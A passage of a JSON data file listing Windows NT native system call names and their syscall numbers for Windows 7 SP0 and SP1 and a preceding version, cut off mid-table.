\"NtFilterToken\": \"192\", \"NtFlushInstallUILanguage\": \"193\", \"NtFlushInstructionCache\": \"194\", \"NtFlushKey\": \"195\", \"NtFlushProcessWriteBuffers\": \"196\", \"NtFlushVirtualMemory\": \"197\", \"NtFlushWriteBuffer\": \"198\", \"NtFreeUserPhysicalPages\": \"199\", \"NtFreezeRegistry\": \"200\", \"NtFreezeTransactions\": \"201\", \"NtGetContextThread\": \"202\", \"NtGetCurrentProcessorNumber\": \"203\", \"NtGetDevicePowerState\": \"204\", \"NtGetMUIRegistryInfo\": \"205\", \"NtGetNextProcess\": \"206\", \"NtGetNextThread\": \"207\", \"NtGetNlsSectionPtr\": \"208\", \"NtGetNotificationResourceManager\": \"209\", \"NtGetPlugPlayEvent\": \"210\", \"NtGetWriteWatch\": \"211\", \"NtImpersonateAnonymousToken\": \"212\", \"NtImpersonateThread\": \"213\", \"NtInitializeNlsFiles\": \"214\", \"NtInitializeRegistry\": \"215\", \"NtInitiatePowerAction\": \"216\", \"NtIsSystemResumeAutomatic\": \"217\", \"NtIsUILanguageComitted\": \"218\", \"NtListenPort\": \"219\", \"NtLoadDriver\": \"220\", \"NtLoadKey\": \"221\", \"NtLoadKey2\": \"222\", \"NtLoadKeyEx\": \"223\", \"NtLockFile\": \"224\", \"NtLockProductActivationKeys\": \"225\", \"NtLockRegistryKey\": \"226\", \"NtLockVirtualMemory\": \"227\", \"NtMakePermanentObject\": \"228\", \"NtMakeTemporaryObject\": \"229\", \"NtMapCMFModule\": \"230\", \"NtMapUserPhysicalPages\": \"231\", \"NtModifyBootEntry\": \"232\", \"NtModifyDriverEntry\": \"233\", \"NtNotifyChangeDirectoryFile\": \"234\", \"NtNotifyChangeKey\": \"235\", \"NtNotifyChangeMultipleKeys\": \"236\", \"NtNotifyChangeSession\": \"237\", \"NtOpenEnlistment\": \"238\", \"NtOpenEventPair\": \"239\", \"NtOpenIoCompletion\": \"240\", \"NtOpenJobObject\": \"241\", \"NtOpenKeyEx\": \"242\", \"NtOpenKeyTransacted\": \"243\", \"NtOpenKeyTransactedEx\": \"244\", \"NtOpenKeyedEvent\": \"245\", \"NtOpenMutant\": \"246\", \"NtOpenObjectAuditAlarm\": \"247\", \"NtOpenPrivateNamespace\": \"248\", \"NtOpenProcessToken\": \"249\", \"NtOpenResourceManager\": \"250\", \"NtOpenSemaphore\": \"251\", \"NtOpenSession\": \"252\", \"NtOpenSymbolicLinkObject\": \"253\", \"NtOpenThread\": \"254\", \"NtOpenTimer\": \"255\", \"NtOpenTransaction\": \"256\", \"NtOpenTransactionManager\": \"257\", \"NtPlugPlayControl\": \"258\", \"NtPrePrepareComplete\": \"259\", \"NtPrePrepareEnlistment\": \"260\", \"NtPrepareComplete\": \"261\", \"NtPrepareEnlistment\": \"262\", \"NtPrivilegeCheck\": \"263\", \"NtPrivilegeObjectAuditAlarm\": \"264\", \"NtPrivilegedServiceAuditAlarm\": \"265\", \"NtPropagationComplete\": \"266\", \"NtPropagationFailed\": \"267\", \"NtPulseEvent\": \"268\", \"NtQueryBootEntryOrder\": \"269\", \"NtQueryBootOptions\": \"270\", \"NtQueryDebugFilterState\": \"271\", \"NtQueryDirectoryObject\": \"272\", \"NtQueryDriverEntryOrder\": \"273\", \"NtQueryEaFile\": \"274\", \"NtQueryFullAttributesFile\": \"275\", \"NtQueryInformationAtom\": \"276\", \"NtQueryInformationEnlistment\": \"277\", \"NtQueryInformationJobObject\": \"278\", \"NtQueryInformationPort\": \"279\", \"NtQueryInformationResourceManager\": \"280\", \"NtQueryInformationTransaction\": \"281\", \"NtQueryInformationTransactionManager\": \"282\", \"NtQueryInformationWorkerFactory\": \"283\", \"NtQueryInstallUILanguage\": \"284\", \"NtQueryIntervalProfile\": \"285\", \"NtQueryIoCompletion\": \"286\", \"NtQueryLicenseValue\": \"287\", \"NtQueryMultipleValueKey\": \"288\", \"NtQueryMutant\": \"289\", \"NtQueryOpenSubKeys\": \"290\", \"NtQueryOpenSubKeysEx\": \"291\", \"NtQueryPortInformationProcess\": \"292\", \"NtQueryQuotaInformationFile\": \"293\", \"NtQuerySecurityAttributesToken\": \"294\", \"NtQuerySecurityObject\": \"295\", \"NtQuerySemaphore\": \"296\", \"NtQuerySymbolicLinkObject\": \"297\", \"NtQuerySystemEnvironmentValue\": \"298\", \"NtQuerySystemEnvironmentValueEx\": \"299\", \"NtQuerySystemInformationEx\": \"300\", \"NtQueryTimerResolution\": \"301\", \"NtQueueApcThreadEx\": \"302\", \"NtRaiseException\": \"303\", \"NtRaiseHardError\": \"304\", \"NtReadOnlyEnlistment\": \"305\", \"NtRecoverEnlistment\": \"306\", \"NtRecoverResourceManager\": \"307\", \"NtRecoverTransactionManager\": \"308\", \"NtRegisterProtocolAddressInformation\": \"309\", \"NtRegisterThreadTerminatePort\": \"310\", \"NtReleaseKeyedEvent\": \"311\", \"NtReleaseWorkerFactoryWorker\": \"312\", \"NtRemoveIoCompletionEx\": \"313\", \"NtRemoveProcessDebug\": \"314\", \"NtRenameKey\": \"315\", \"NtRenameTransactionManager\": \"316\", \"NtReplaceKey\": \"317\", \"NtReplacePartitionUnit\": \"318\", \"NtReplyWaitReplyPort\": \"319\", \"NtRequestPort\": \"320\", \"NtResetEvent\": \"321\", \"NtResetWriteWatch\": \"322\", \"NtRestoreKey\": \"323\", \"NtResumeProcess\": \"324\", \"NtRollbackComplete\": \"325\", \"NtRollbackEnlistment\": \"326\", \"NtRollbackTransaction\": \"327\", \"NtRollforwardTransactionManager\": \"328\", \"NtSaveKey\": \"329\", \"NtSaveKeyEx\": \"330\", \"NtSaveMergedKeys\": \"331\", \"NtSecureConnectPort\": \"332\", \"NtSerializeBoot\": \"333\", \"NtSetBootEntryOrder\": \"334\", \"NtSetBootOptions\": \"335\", \"NtSetContextThread\": \"336\", \"NtSetDebugFilterState\": \"337\", \"NtSetDefaultHardErrorPort\": \"338\", \"NtSetDefaultLocale\": \"339\", \"NtSetDefaultUILanguage\": \"340\", \"NtSetDriverEntryOrder\": \"341\", \"NtSetEaFile\": \"342\", \"NtSetHighEventPair\": \"343\", \"NtSetHighWaitLowEventPair\": \"344\", \"NtSetInformationDebugObject\": \"345\", \"NtSetInformationEnlistment\": \"346\", \"NtSetInformationJobObject\": \"347\", \"NtSetInformationKey\": \"348\", \"NtSetInformationResourceManager\": \"349\", \"NtSetInformationToken\": \"350\", \"NtSetInformationTransaction\": \"351\", \"NtSetInformationTransactionManager\": \"352\", \"NtSetInformationWorkerFactory\": \"353\", \"NtSetIntervalProfile\": \"354\", \"NtSetIoCompletion\": \"355\", \"NtSetIoCompletionEx\": \"356\", \"NtSetLdtEntries\": \"357\", \"NtSetLowEventPair\": \"358\", \"NtSetLowWaitHighEventPair\": \"359\", \"NtSetQuotaInformationFile\": \"360\", \"NtSetSecurityObject\": \"361\", \"NtSetSystemEnvironmentValue\": \"362\", \"NtSetSystemEnvironmentValueEx\": \"363\", \"NtSetSystemInformation\": \"364\", \"NtSetSystemPowerState\": \"365\", \"NtSetSystemTime\": \"366\", \"NtSetThreadExecutionState\": \"367\", \"NtSetTimerEx\": \"368\", \"NtSetTimerResolution\": \"369\", \"NtSetUuidSeed\": \"370\", \"NtSetVolumeInformationFile\": \"371\", \"NtShutdownSystem\": \"372\", \"NtShutdownWorkerFactory\": \"373\", \"NtSignalAndWaitForSingleObject\": \"374\", \"NtSinglePhaseReject\": \"375\", \"NtStartProfile\": \"376\", \"NtStopProfile\": \"377\", \"NtSuspendProcess\": \"378\", \"NtSuspendThread\": \"379\", \"NtSystemDebugControl\": \"380\", \"NtTerminateJobObject\": \"381\", \"NtTestAlert\": \"382\", \"NtThawRegistry\": \"383\", \"NtThawTransactions\": \"384\", \"NtTraceControl\": \"385\", \"NtTranslateFilePath\": \"386\", \"NtUmsThreadYield\": \"387\", \"NtUnloadDriver\": \"388\", \"NtUnloadKey\": \"389\", \"NtUnloadKey2\": \"390\", \"NtUnloadKeyEx\": \"391\", \"NtUnlockFile\": \"392\", \"NtUnlockVirtualMemory\": \"393\", \"NtVdmControl\": \"394\", \"NtWaitForDebugEvent\": \"395\", \"NtWaitForKeyedEvent\": \"396\", \"NtWaitForWorkViaWorkerFactory\": \"397\", \"NtWaitHighEventPair\": \"398\", \"NtWaitLowEventPair\": \"399\", \"NtWorkerFactoryWorkerReady\": \"400\"}}, \"Windows 7\": {\"SP0\": {\"NtMapUserPhysicalPagesScatter\": \"0\", \"NtWaitForSingleObject\": \"1\", \"NtCallbackReturn\": \"2\", \"NtReadFile\": \"3\", \"NtDeviceIoControlFile\": \"4\", \"NtWriteFile\": \"5\", \"NtRemoveIoCompletion\": \"6\", \"NtReleaseSemaphore\": \"7\", \"NtReplyWaitReceivePort\": \"8\", \"NtReplyPort\": \"9\", \"NtSetInformationThread\": \"10\", \"NtSetEvent\": \"11\", \"NtClose\": \"12\", \"NtQueryObject\": \"13\", \"NtQueryInformationFile\": \"14\", \"NtOpenKey\": \"15\", \"NtEnumerateValueKey\": \"16\", \"NtFindAtom\": \"17\", \"NtQueryDefaultLocale\": \"18\", \"NtQueryKey\": \"19\", \"NtQueryValueKey\": \"20\", \"NtAllocateVirtualMemory\": \"21\", \"NtQueryInformationProcess\": \"22\", \"NtWaitForMultipleObjects32\": \"23\", \"NtWriteFileGather\": \"24\", \"NtSetInformationProcess\": \"25\", \"NtCreateKey\": \"26\", \"NtFreeVirtualMemory\": \"27\", \"NtImpersonateClientOfPort\": \"28\", \"NtReleaseMutant\": \"29\", \"NtQueryInformationToken\": \"30\", \"NtRequestWaitReplyPort\": \"31\", \"NtQueryVirtualMemory\": \"32\", \"NtOpenThreadToken\": \"33\", \"NtQueryInformationThread\": \"34\", \"NtOpenProcess\": \"35\", \"NtSetInformationFile\": \"36\", \"NtMapViewOfSection\": \"37\", \"NtAccessCheckAndAuditAlarm\": \"38\", \"NtUnmapViewOfSection\": \"39\", \"NtReplyWaitReceivePortEx\": \"40\", \"NtTerminateProcess\": \"41\", \"NtSetEventBoostPriority\": \"42\", \"NtReadFileScatter\": \"43\", \"NtOpenThreadTokenEx\": \"44\", \"NtOpenProcessTokenEx\": \"45\", \"NtQueryPerformanceCounter\": \"46\", \"NtEnumerateKey\": \"47\", \"NtOpenFile\": \"48\", \"NtDelayExecution\": \"49\", \"NtQueryDirectoryFile\": \"50\", \"NtQuerySystemInformation\": \"51\", \"NtOpenSection\": \"52\", \"NtQueryTimer\": \"53\", \"NtFsControlFile\": \"54\", \"NtWriteVirtualMemory\": \"55\", \"NtCloseObjectAuditAlarm\": \"56\", \"NtDuplicateObject\": \"57\", \"NtQueryAttributesFile\": \"58\", \"NtClearEvent\": \"59\", \"NtReadVirtualMemory\": \"60\", \"NtOpenEvent\": \"61\", \"NtAdjustPrivilegesToken\": \"62\", \"NtDuplicateToken\": \"63\", \"NtContinue\": \"64\", \"NtQueryDefaultUILanguage\": \"65\", \"NtQueueApcThread\": \"66\", \"NtYieldExecution\": \"67\", \"NtAddAtom\": \"68\", \"NtCreateEvent\": \"69\", \"NtQueryVolumeInformationFile\": \"70\", \"NtCreateSection\": \"71\", \"NtFlushBuffersFile\": \"72\", \"NtApphelpCacheControl\": \"73\", \"NtCreateProcessEx\": \"74\", \"NtCreateThread\": \"75\", \"NtIsProcessInJob\": \"76\", \"NtProtectVirtualMemory\": \"77\", \"NtQuerySection\": \"78\", \"NtResumeThread\": \"79\", \"NtTerminateThread\": \"80\", \"NtReadRequestData\": \"81\", \"NtCreateFile\": \"82\", \"NtQueryEvent\": \"83\", \"NtWriteRequestData\": \"84\", \"NtOpenDirectoryObject\": \"85\", \"NtAccessCheckByTypeAndAuditAlarm\": \"86\", \"NtQuerySystemTime\": \"87\", \"NtWaitForMultipleObjects\": \"88\", \"NtSetInformationObject\": \"89\", \"NtCancelIoFile\": \"90\", \"NtTraceEvent\": \"91\", \"NtPowerInformation\": \"92\", \"NtSetValueKey\": \"93\", \"NtCancelTimer\": \"94\", \"NtSetTimer\": \"95\", \"NtAcceptConnectPort\": \"96\", \"NtAccessCheck\": \"97\", \"NtAccessCheckByType\": \"98\", \"NtAccessCheckByTypeResultList\": \"99\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"101\", \"NtAddBootEntry\": \"102\", \"NtAddDriverEntry\": \"103\", \"NtAdjustGroupsToken\": \"104\", \"NtAlertResumeThread\": \"105\", \"NtAlertThread\": \"106\", \"NtAllocateLocallyUniqueId\": \"107\", \"NtAllocateReserveObject\": \"108\", \"NtAllocateUserPhysicalPages\": \"109\", \"NtAllocateUuids\": \"110\", \"NtAlpcAcceptConnectPort\": \"111\", \"NtAlpcCancelMessage\": \"112\", \"NtAlpcConnectPort\": \"113\", \"NtAlpcCreatePort\": \"114\", \"NtAlpcCreatePortSection\": \"115\", \"NtAlpcCreateResourceReserve\": \"116\", \"NtAlpcCreateSectionView\": \"117\", \"NtAlpcCreateSecurityContext\": \"118\", \"NtAlpcDeletePortSection\": \"119\", \"NtAlpcDeleteResourceReserve\": \"120\", \"NtAlpcDeleteSectionView\": \"121\", \"NtAlpcDeleteSecurityContext\": \"122\", \"NtAlpcDisconnectPort\": \"123\", \"NtAlpcImpersonateClientOfPort\": \"124\", \"NtAlpcOpenSenderProcess\": \"125\", \"NtAlpcOpenSenderThread\": \"126\", \"NtAlpcQueryInformation\": \"127\", \"NtAlpcQueryInformationMessage\": \"128\", \"NtAlpcRevokeSecurityContext\": \"129\", \"NtAlpcSendWaitReceivePort\": \"130\", \"NtAlpcSetInformation\": \"131\", \"NtAreMappedFilesTheSame\": \"132\", \"NtAssignProcessToJobObject\": \"133\", \"NtCancelIoFileEx\": \"134\", \"NtCancelSynchronousIoFile\": \"135\", \"NtCommitComplete\": \"136\", \"NtCommitEnlistment\": \"137\", \"NtCommitTransaction\": \"138\", \"NtCompactKeys\": \"139\", \"NtCompareTokens\": \"140\", \"NtCompleteConnectPort\": \"141\", \"NtCompressKey\": \"142\", \"NtConnectPort\": \"143\", \"NtCreateDebugObject\": \"144\", \"NtCreateDirectoryObject\": \"145\", \"NtCreateEnlistment\": \"146\", \"NtCreateEventPair\": \"147\", \"NtCreateIoCompletion\": \"148\", \"NtCreateJobObject\": \"149\", \"NtCreateJobSet\": \"150\", \"NtCreateKeyTransacted\": \"151\", \"NtCreateKeyedEvent\": \"152\", \"NtCreateMailslotFile\": \"153\", \"NtCreateMutant\": \"154\", \"NtCreateNamedPipeFile\": \"155\", \"NtCreatePagingFile\": \"156\", \"NtCreatePort\": \"157\", \"NtCreatePrivateNamespace\": \"158\", \"NtCreateProcess\": \"159\", \"NtCreateProfile\": \"160\", \"NtCreateProfileEx\": \"161\", \"NtCreateResourceManager\": \"162\", \"NtCreateSemaphore\": \"163\", \"NtCreateSymbolicLinkObject\": \"164\", \"NtCreateThreadEx\": \"165\", \"NtCreateTimer\": \"166\", \"NtCreateToken\": \"167\", \"NtCreateTransaction\": \"168\", \"NtCreateTransactionManager\": \"169\", \"NtCreateUserProcess\": \"170\", \"NtCreateWaitablePort\": \"171\", \"NtCreateWorkerFactory\": \"172\", \"NtDebugActiveProcess\": \"173\", \"NtDebugContinue\": \"174\", \"NtDeleteAtom\": \"175\", \"NtDeleteBootEntry\": \"176\", \"NtDeleteDriverEntry\": \"177\", \"NtDeleteFile\": \"178\", \"NtDeleteKey\": \"179\", \"NtDeleteObjectAuditAlarm\": \"180\", \"NtDeletePrivateNamespace\": \"181\", \"NtDeleteValueKey\": \"182\", \"NtDisableLastKnownGood\": \"183\", \"NtDisplayString\": \"184\", \"NtDrawText\": \"185\", \"NtEnableLastKnownGood\": \"186\", \"NtEnumerateBootEntries\": \"187\", \"NtEnumerateDriverEntries\": \"188\", \"NtEnumerateSystemEnvironmentValuesEx\": \"189\", \"NtEnumerateTransactionObject\": \"190\", \"NtExtendSection\": \"191\", \"NtFilterToken\": \"192\", \"NtFlushInstallUILanguage\": \"193\", \"NtFlushInstructionCache\": \"194\", \"NtFlushKey\": \"195\", \"NtFlushProcessWriteBuffers\": \"196\", \"NtFlushVirtualMemory\": \"197\", \"NtFlushWriteBuffer\": \"198\", \"NtFreeUserPhysicalPages\": \"199\", \"NtFreezeRegistry\": \"200\", \"NtFreezeTransactions\": \"201\", \"NtGetContextThread\": \"202\", \"NtGetCurrentProcessorNumber\": \"203\", \"NtGetDevicePowerState\": \"204\", \"NtGetMUIRegistryInfo\": \"205\", \"NtGetNextProcess\": \"206\", \"NtGetNextThread\": \"207\", \"NtGetNlsSectionPtr\": \"208\", \"NtGetNotificationResourceManager\": \"209\", \"NtGetPlugPlayEvent\": \"210\", \"NtGetWriteWatch\": \"211\", \"NtImpersonateAnonymousToken\": \"212\", \"NtImpersonateThread\": \"213\", \"NtInitializeNlsFiles\": \"214\", \"NtInitializeRegistry\": \"215\", \"NtInitiatePowerAction\": \"216\", \"NtIsSystemResumeAutomatic\": \"217\", \"NtIsUILanguageComitted\": \"218\", \"NtListenPort\": \"219\", \"NtLoadDriver\": \"220\", \"NtLoadKey\": \"221\", \"NtLoadKey2\": \"222\", \"NtLoadKeyEx\": \"223\", \"NtLockFile\": \"224\", \"NtLockProductActivationKeys\": \"225\", \"NtLockRegistryKey\": \"226\", \"NtLockVirtualMemory\": \"227\", \"NtMakePermanentObject\": \"228\", \"NtMakeTemporaryObject\": \"229\", \"NtMapCMFModule\": \"230\", \"NtMapUserPhysicalPages\": \"231\", \"NtModifyBootEntry\": \"232\", \"NtModifyDriverEntry\": \"233\", \"NtNotifyChangeDirectoryFile\": \"234\", \"NtNotifyChangeKey\": \"235\", \"NtNotifyChangeMultipleKeys\": \"236\", \"NtNotifyChangeSession\": \"237\", \"NtOpenEnlistment\": \"238\", \"NtOpenEventPair\": \"239\", \"NtOpenIoCompletion\": \"240\", \"NtOpenJobObject\": \"241\", \"NtOpenKeyEx\": \"242\", \"NtOpenKeyTransacted\": \"243\", \"NtOpenKeyTransactedEx\": \"244\", \"NtOpenKeyedEvent\": \"245\", \"NtOpenMutant\": \"246\", \"NtOpenObjectAuditAlarm\": \"247\", \"NtOpenPrivateNamespace\": \"248\", \"NtOpenProcessToken\": \"249\", \"NtOpenResourceManager\": \"250\", \"NtOpenSemaphore\": \"251\", \"NtOpenSession\": \"252\", \"NtOpenSymbolicLinkObject\": \"253\", \"NtOpenThread\": \"254\", \"NtOpenTimer\": \"255\", \"NtOpenTransaction\": \"256\", \"NtOpenTransactionManager\": \"257\", \"NtPlugPlayControl\": \"258\", \"NtPrePrepareComplete\": \"259\", \"NtPrePrepareEnlistment\": \"260\", \"NtPrepareComplete\": \"261\", \"NtPrepareEnlistment\": \"262\", \"NtPrivilegeCheck\": \"263\", \"NtPrivilegeObjectAuditAlarm\": \"264\", \"NtPrivilegedServiceAuditAlarm\": \"265\", \"NtPropagationComplete\": \"266\", \"NtPropagationFailed\": \"267\", \"NtPulseEvent\": \"268\", \"NtQueryBootEntryOrder\": \"269\", \"NtQueryBootOptions\": \"270\", \"NtQueryDebugFilterState\": \"271\", \"NtQueryDirectoryObject\": \"272\", \"NtQueryDriverEntryOrder\": \"273\", \"NtQueryEaFile\": \"274\", \"NtQueryFullAttributesFile\": \"275\", \"NtQueryInformationAtom\": \"276\", \"NtQueryInformationEnlistment\": \"277\", \"NtQueryInformationJobObject\": \"278\", \"NtQueryInformationPort\": \"279\", \"NtQueryInformationResourceManager\": \"280\", \"NtQueryInformationTransaction\": \"281\", \"NtQueryInformationTransactionManager\": \"282\", \"NtQueryInformationWorkerFactory\": \"283\", \"NtQueryInstallUILanguage\": \"284\", \"NtQueryIntervalProfile\": \"285\", \"NtQueryIoCompletion\": \"286\", \"NtQueryLicenseValue\": \"287\", \"NtQueryMultipleValueKey\": \"288\", \"NtQueryMutant\": \"289\", \"NtQueryOpenSubKeys\": \"290\", \"NtQueryOpenSubKeysEx\": \"291\", \"NtQueryPortInformationProcess\": \"292\", \"NtQueryQuotaInformationFile\": \"293\", \"NtQuerySecurityAttributesToken\": \"294\", \"NtQuerySecurityObject\": \"295\", \"NtQuerySemaphore\": \"296\", \"NtQuerySymbolicLinkObject\": \"297\", \"NtQuerySystemEnvironmentValue\": \"298\", \"NtQuerySystemEnvironmentValueEx\": \"299\", \"NtQuerySystemInformationEx\": \"300\", \"NtQueryTimerResolution\": \"301\", \"NtQueueApcThreadEx\": \"302\", \"NtRaiseException\": \"303\", \"NtRaiseHardError\": \"304\", \"NtReadOnlyEnlistment\": \"305\", \"NtRecoverEnlistment\": \"306\", \"NtRecoverResourceManager\": \"307\", \"NtRecoverTransactionManager\": \"308\", \"NtRegisterProtocolAddressInformation\": \"309\", \"NtRegisterThreadTerminatePort\": \"310\", \"NtReleaseKeyedEvent\": \"311\", \"NtReleaseWorkerFactoryWorker\": \"312\", \"NtRemoveIoCompletionEx\": \"313\", \"NtRemoveProcessDebug\": \"314\", \"NtRenameKey\": \"315\", \"NtRenameTransactionManager\": \"316\", \"NtReplaceKey\": \"317\", \"NtReplacePartitionUnit\": \"318\", \"NtReplyWaitReplyPort\": \"319\", \"NtRequestPort\": \"320\", \"NtResetEvent\": \"321\", \"NtResetWriteWatch\": \"322\", \"NtRestoreKey\": \"323\", \"NtResumeProcess\": \"324\", \"NtRollbackComplete\": \"325\", \"NtRollbackEnlistment\": \"326\", \"NtRollbackTransaction\": \"327\", \"NtRollforwardTransactionManager\": \"328\", \"NtSaveKey\": \"329\", \"NtSaveKeyEx\": \"330\", \"NtSaveMergedKeys\": \"331\", \"NtSecureConnectPort\": \"332\", \"NtSerializeBoot\": \"333\", \"NtSetBootEntryOrder\": \"334\", \"NtSetBootOptions\": \"335\", \"NtSetContextThread\": \"336\", \"NtSetDebugFilterState\": \"337\", \"NtSetDefaultHardErrorPort\": \"338\", \"NtSetDefaultLocale\": \"339\", \"NtSetDefaultUILanguage\": \"340\", \"NtSetDriverEntryOrder\": \"341\", \"NtSetEaFile\": \"342\", \"NtSetHighEventPair\": \"343\", \"NtSetHighWaitLowEventPair\": \"344\", \"NtSetInformationDebugObject\": \"345\", \"NtSetInformationEnlistment\": \"346\", \"NtSetInformationJobObject\": \"347\", \"NtSetInformationKey\": \"348\", \"NtSetInformationResourceManager\": \"349\", \"NtSetInformationToken\": \"350\", \"NtSetInformationTransaction\": \"351\", \"NtSetInformationTransactionManager\": \"352\", \"NtSetInformationWorkerFactory\": \"353\", \"NtSetIntervalProfile\": \"354\", \"NtSetIoCompletion\": \"355\", \"NtSetIoCompletionEx\": \"356\", \"NtSetLdtEntries\": \"357\", \"NtSetLowEventPair\": \"358\", \"NtSetLowWaitHighEventPair\": \"359\", \"NtSetQuotaInformationFile\": \"360\", \"NtSetSecurityObject\": \"361\", \"NtSetSystemEnvironmentValue\": \"362\", \"NtSetSystemEnvironmentValueEx\": \"363\", \"NtSetSystemInformation\": \"364\", \"NtSetSystemPowerState\": \"365\", \"NtSetSystemTime\": \"366\", \"NtSetThreadExecutionState\": \"367\", \"NtSetTimerEx\": \"368\", \"NtSetTimerResolution\": \"369\", \"NtSetUuidSeed\": \"370\", \"NtSetVolumeInformationFile\": \"371\", \"NtShutdownSystem\": \"372\", \"NtShutdownWorkerFactory\": \"373\", \"NtSignalAndWaitForSingleObject\": \"374\", \"NtSinglePhaseReject\": \"375\", \"NtStartProfile\": \"376\", \"NtStopProfile\": \"377\", \"NtSuspendProcess\": \"378\", \"NtSuspendThread\": \"379\", \"NtSystemDebugControl\": \"380\", \"NtTerminateJobObject\": \"381\", \"NtTestAlert\": \"382\", \"NtThawRegistry\": \"383\", \"NtThawTransactions\": \"384\", \"NtTraceControl\": \"385\", \"NtTranslateFilePath\": \"386\", \"NtUmsThreadYield\": \"387\", \"NtUnloadDriver\": \"388\", \"NtUnloadKey\": \"389\", \"NtUnloadKey2\": \"390\", \"NtUnloadKeyEx\": \"391\", \"NtUnlockFile\": \"392\", \"NtUnlockVirtualMemory\": \"393\", \"NtVdmControl\": \"394\", \"NtWaitForDebugEvent\": \"395\", \"NtWaitForKeyedEvent\": \"396\", \"NtWaitForWorkViaWorkerFactory\": \"397\", \"NtWaitHighEventPair\": \"398\", \"NtWaitLowEventPair\": \"399\", \"NtWorkerFactoryWorkerReady\": \"400\"}, \"SP1\": {\"NtMapUserPhysicalPagesScatter\": \"0\", \"NtWaitForSingleObject\": \"1\", \"NtCallbackReturn\": \"2\", \"NtReadFile\": \"3\", \"NtDeviceIoControlFile\": \"4\", \"NtWriteFile\": \"5\", \"NtRemoveIoCompletion\": \"6\", \"NtReleaseSemaphore\": \"7\", \"NtReplyWaitReceivePort\": \"8\", \"NtReplyPort\": \"9\", \"NtSetInformationThread\": \"10\", \"NtSetEvent\": \"11\", \"NtClose\": \"12\", \"NtQueryObject\": \"13\", \"NtQueryInformationFile\": \"14\", \"NtOpenKey\": \"15\", \"NtEnumerateValueKey\": \"16\", \"NtFindAtom\": \"17\", \"NtQueryDefaultLocale\": \"18\", \"NtQueryKey\": \"19\", \"NtQueryValueKey\": \"20\", \"NtAllocateVirtualMemory\": \"21\", \"NtQueryInformationProcess\": \"22\", \"NtWaitForMultipleObjects32\": \"23\", \"NtWriteFileGather\": \"24\", \"NtSetInformationProcess\": \"25\", \"NtCreateKey\": \"26\", \"NtFreeVirtualMemory\": \"27\", \"NtImpersonateClientOfPort\": \"28\", \"NtReleaseMutant\": \"29\", \"NtQueryInformationToken\": \"30\", \"NtRequestWaitReplyPort\": \"31\", \"NtQueryVirtualMemory\": \"32\", \"NtOpenThreadToken\": \"33\", \"NtQueryInformationThread\": \"34\", \"NtOpenProcess\": \"35\", \"NtSetInformationFile\": \"36\", \"NtMapViewOfSection\": \"37\", \"NtAccessCheckAndAuditAlarm\": \"38\", \"NtUnmapViewOfSection\": \"39\", \"NtReplyWaitReceivePortEx\": \"40\", \"NtTerminateProcess\": \"41\", \"NtSetEventBoostPriority\": \"42\", \"NtReadFileScatter\": \"43\", \"NtOpenThreadTokenEx\": \"44\", \"NtOpenProcessTokenEx\": \"45\", \"NtQueryPerformanceCounter\": \"46\", \"NtEnumerateKey\": \"47\", \"NtOpenFile\": \"48\", \"NtDelayExecution\": \"49\", \"NtQueryDirectoryFile\": \"50\", \"NtQuerySystemInformation\": \"51\", \"NtOpenSection\": \"52\", \"NtQueryTimer\": \"53\", \"NtFsControlFile\": \"54\", \"NtWriteVirtualMemory\": \"55\", \"NtCloseObjectAuditAlarm\": \"56\", \"NtDuplicateObject\": \"57\", \"NtQueryAttributesFile\": \"58\", \"NtClearEvent\": \"59\", \"NtReadVirtualMemory\": \"60\", \"NtOpenEvent\": \"61\", \"NtAdjustPrivilegesToken\": \"62\", \"NtDuplicateToken\": \"63\", \"NtContinue\": \"64\", \"NtQueryDefaultUILanguage\": \"65\", \"NtQueueApcThread\": \"66\", \"NtYieldExecution\": \"67\", \"NtAddAtom\": \"68\", \"NtCreateEvent\": \"69\", \"NtQueryVolumeInformationFile\": \"70\", \"NtCreateSection\": \"71\", \"NtFlushBuffersFile\": \"72\", \"NtApphelpCacheControl\": \"73\", \"NtCreateProcessEx\": \"74\", \"NtCreateThread\": \"75\", \"NtIsProcessInJob\": \"76\", \"NtProtectVirtualMemory\": \"77\", \"NtQuerySection\": \"78\", \"NtResumeThread\": \"79\", \"NtTerminateThread\": \"80\", \"NtReadRequestData\": \"81\", \"NtCreateFile\": \"82\", \"NtQueryEvent\": \"83\", \"NtWriteRequestData\": \"84\", \"NtOpenDirectoryObject\": \"85\", \"NtAccessCheckByTypeAndAuditAlarm\": \"86\", \"NtQuerySystemTime\": \"87\", \"NtWaitForMultipleObjects\": \"88\", \"NtSetInformationObject\": \"89\", \"NtCancelIoFile\": \"90\", \"NtTraceEvent\": \"91\", \"NtPowerInformation\": \"92\", \"NtSetValueKey\": \"93\", \"NtCancelTimer\": \"94\", \"NtSetTimer\": \"95\", \"NtAcceptConnectPort\": \"96\", \"NtAccessCheck\": \"97\", \"NtAccessCheckByType\": \"98\", \"NtAccessCheckByTypeResultList\": \"99\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"101\", \"NtAddBootEntry\": \"102\", \"NtAddDriverEntry\": \"103\", \"NtAdjustGroupsToken\": \"104\", \"NtAlertResumeThread\": \"105\", \"NtAlertThread\": \"106\", \"NtAllocateLocallyUniqueId\": \"107\", \"NtAllocateReserveObject\": \"108\", \"NtAllocateUserPhysicalPages\": \"109\", \"NtAllocateUuids\": \"110\", \"NtAlpcAcceptConnectPort\": \"111\", \"NtAlpcCancelMessage\": \"112\", \"NtAlpcConnectPort\": \"113\", \"NtAlpcCreatePort\": \"114\", \"NtAlpcCreatePortSection\": \"115\", \"NtAlpcCreateResourceReserve\": \"116\", \"NtAlpcCreateSectionView\": \"117\", \"NtAlpcCreateSecurityContext\": \"118\", \"NtAlpcDeletePortSection\": \"119\", \"NtAlpcDeleteResourceReserve\": \"120\", \"NtAlpcDeleteSectionView\": \"121\", \"NtAlpcDeleteSecurityContext\": \"122\", \"NtAlpcDisconnectPort\": \"123\", \"NtAlpcImpersonateClientOfPort\": \"124\", \"NtAlpcOpenSenderProcess\": \"125\", \"NtAlpcOpenSenderThread\": \"126\", \"NtAlpcQueryInformation\": \"127\", \"NtAlpcQueryInformationMessage\": \"128\", \"NtAlpcRevokeSecurityContext\": \"129\", \"NtAlpcSendWaitReceivePort\": \"130\", \"NtAlpcSetInformation\": \"131\", \"NtAreMappedFilesTheSame\": \"132\", \"NtAssignProcessToJobObject\": \"133\", \"NtCancelIoFileEx\": \"134\", \"NtCancelSynchronousIoFile\": \"135\", \"NtCommitComplete\": \"136\", \"NtCommitEnlistment\": 